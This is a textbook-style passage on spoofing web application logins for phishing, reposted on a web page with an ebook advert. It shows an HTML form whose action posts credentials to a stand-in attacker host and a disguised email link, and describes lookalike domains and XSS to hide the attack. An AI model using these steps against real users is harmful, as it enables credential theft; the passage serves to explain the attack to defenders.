Spoofing Web Applications







Risk Rating:


Organizations can present any number of different types of web applications openly to the Internet, including Internet banking applications, web mail services, and SSL VPNs. Each web application produces its own set of risks to an organization if compromised. Let's say that our target organization is running an SSL VPN that employees authenticate to from home to gain remote access to their respective servers and files.

Since the web application is open to the Internet, the attacker is able to mirror the logon page and place it onto his or her own web server. The simplest way to do this is to browse to the web application using your favorite web browser and select the Save As ... option. This will generally save the HTML source code and all required images and files to the specified directory on the local hard drive. You can also mirror websites by using Linux tools such as wget or curl.

Once the spoofed website is mirrored onto the attacker's web server, the attacker now needs to alter the HTML source code to perform the action required. This may be as simple as changing the action of the login form to post the authentication credentials to a program on the attacker's web server rather than on the organization's web server:

<FORM action="http://www.malicious site.com/capture.php" method=POST>

This capture.php program may append the credentials to a file or email them to the attacker. This spoofed website can then be used to extend an identity spoofing attack, such as the one just described. This type of attack is commonly referred to as a phishing attack. One way of carrying out this attack is to create an HTML email containing a link that, at face value, appears to point to the organization's internal web application; however, within the HTML source code, the link actually points to the attacker's phishing website:

<a href=http://www.malicious site.com/spoofed.php>Click Here</a>

An example of a spoofed email containing the link is shown in Figure 13-14, where the link Click Here points to the phishing website.

The main downfall to these types of attacks is that in many cases the browser window may contain the attacker's URL, www.malicious_site.com, in the address bar, which may alert any victims to the attack. In reality, attackers tend either to register a domain name similar to the target organization, with slight modifications, such as www.organizati0n .com, or to simply create a subdomain for a domain that they already own, such as organization.com.malicious_site.com.

The attacker's URL may be hidden by having the link in the email instruct the browser to open the window without the address bar, or a vulnerability such as cross-site scripting may be present on the organization's website, which allows the attacker to have the valid organization's domain name actually appear in the address bar.

Was this article helpful?

0 0
The Ultimate Computer Repair Guide

The Ultimate Computer Repair Guide

Read how to maintain and repair any desktop and laptop computer. This Ebook has articles with photos and videos that show detailed step by step pc repair and maintenance procedures. There are many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket.

Get My Free Ebook

Post a comment